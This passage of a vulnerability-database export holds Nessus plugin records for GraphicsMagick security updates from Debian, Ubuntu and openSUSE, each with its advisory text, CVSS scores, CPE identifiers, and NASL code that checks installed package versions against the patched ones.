audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:30", "description": "CVE-2017-13776 CVE-2017-13777 denial of service issue in ReadXBMImage()\n\nCVE-2017-12935 The ReadMNGImage function in coders/png.c mishandles large MNG images, leading to an invalid memory read in the SetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936 The ReadWMFImage function in coders/wmf.c has a use-after-free issue for data associated with exception reporting.\n\nCVE-2017-12937 The ReadSUNImage function in coders/sun.c has a colormap heap-based buffer over-read.\n\nCVE-2017-13063 CVE-2017-13064 heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c\n\nCVE-2017-13065 NULL pointer dereference vulnerability in the function SVGStartElement in coders/svg.c\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-01T00:00:00", "type": "nessus", "title": "Debian DLA-1082-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1082.NASL", "href": "https://www.tenable.com/plugins/nessus/102890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1082-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102890);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n\n script_name(english:\"Debian DLA-1082-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2017-13776 CVE-2017-13777 denial of service issue in\nReadXBMImage()\n\nCVE-2017-12935 The ReadMNGImage function in coders/png.c mishandles\nlarge MNG images, leading to an invalid memory read in the\nSetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936 The ReadWMFImage function in coders/wmf.c has a\nuse-after-free issue for data associated with exception reporting.\n\nCVE-2017-12937 The ReadSUNImage function in coders/sun.c has a\ncolormap heap-based buffer over-read.\n\nCVE-2017-13063 CVE-2017-13064 heap-based buffer overflow vulnerability\nin the function GetStyleTokens in coders/svg.c\n\nCVE-2017-13065 NULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-09-01T00:25:14", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4222-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:graphicsmagick", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4222-1.NASL", "href": "https://www.tenable.com/plugins/nessus/132095", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4222-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132095);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_xref(name:\"USN\", value:\"4222-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4222-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4222-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected graphicsmagick, libgraphicsmagick++-q16-12 and /\nor libgraphicsmagick-q16-3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"graphicsmagick\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick++-q16-12\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick-q16-3\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphicsmagick / libgraphicsmagick++-q16-12 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-12T15:18:24", "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set of command-line applications to manipulate image files, which could result in denial of service or the execution of arbitrary code if malformed image files are processed.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-18T00:00:00", "type": "nessus", "title": "Debian DSA-4321-1 : graphicsmagick - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", "CVE-2018-6799", "CVE-2018-9018"], "modified": "2019-07-15T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:graphicsmagick:*:*:*:*:*:*:*"], "id": "DEBIAN_DSA-4321.NASL", "href": "https://www.tenable.com/plugins/nessus/118179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4321. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118179);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\", \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\", \"CVE-2018-9018\");\n script_xref(name:\"DSA\", value:\"4321\");\n\n script_name(english:\"Debian DSA-4321-1 : graphicsmagick - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in GraphicsMagick, a set\nof command-line applications to manipulate image files, which could\nresult in denial of service or the execution of arbitrary code if\nmalformed image files are processed.\"\n );\n # https://security-tracker.debian.org/tracker/source-package/graphicsmagick\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e247f871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/graphicsmagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4321\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the graphicsmagick packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1.3.30+hg15796-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++-q16-12\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick-q16-3\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:28:08", "description": "This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-13775: Fixed a denial of service issue in ReadJNXImage() in coders/jnx.c (boo#1056431)\n\n - CVE-2017-13063: Fixed a heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c (bsc#1055050)\n\n - CVE-2017-13064: Fixed a heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c (bsc#1055042)\n\n - CVE-2017-12936: The ReadWMFImage function in coders/wmf.c in GraphicsMagick had a use-after-free issue for data associated with exception reporting.\n (bsc#1054598)\n\n - CVE-2017-13139: The ReadOneMNGImage function in coders/png.c had an out-of-bounds read with the MNG CLIP chunk. (bsc#1055430)\n\n - CVE-2017-12937: The ReadSUNImage function in coders/sun.c in GraphicsMagick had a colormap heap-based buffer over-read. (bsc#1054596)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2017-1199)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13139", "CVE-2017-13775"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1199.NASL", "href": "https://www.tenable.com/plugins/nessus/104235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1199.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104235);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13139\", \"CVE-2017-13775\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2017-1199)\");\n script_summary(english:\"Check for the openSUSE-2017-1199 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-13775: Fixed a denial of service issue in\n ReadJNXImage() in coders/jnx.c (boo#1056431)\n\n - CVE-2017-13063: Fixed a heap-based buffer overflow\n vulnerability in the function GetStyleTokens in\n coders/svg.c (bsc#1055050)\n\n - CVE-2017-13064: Fixed a heap-based buffer overflow\n vulnerability in the function GetStyleTokens in\n coders/svg.c (bsc#1055042)\n\n - CVE-2017-12936: The ReadWMFImage function in\n coders/wmf.c in GraphicsMagick had a use-after-free\n issue for data associated with exception reporting.\n (bsc#1054598)\n\n - CVE-2017-13139: The ReadOneMNGImage function in\n coders/png.c had an out-of-bounds read with the MNG CLIP\n chunk. (bsc#1055430)\n\n - CVE-2017-12937: The ReadSUNImage function in\n coders/sun.c in GraphicsMagick had a colormap heap-based\n buffer over-read. (bsc#1054596)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1054596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1054598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056431\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 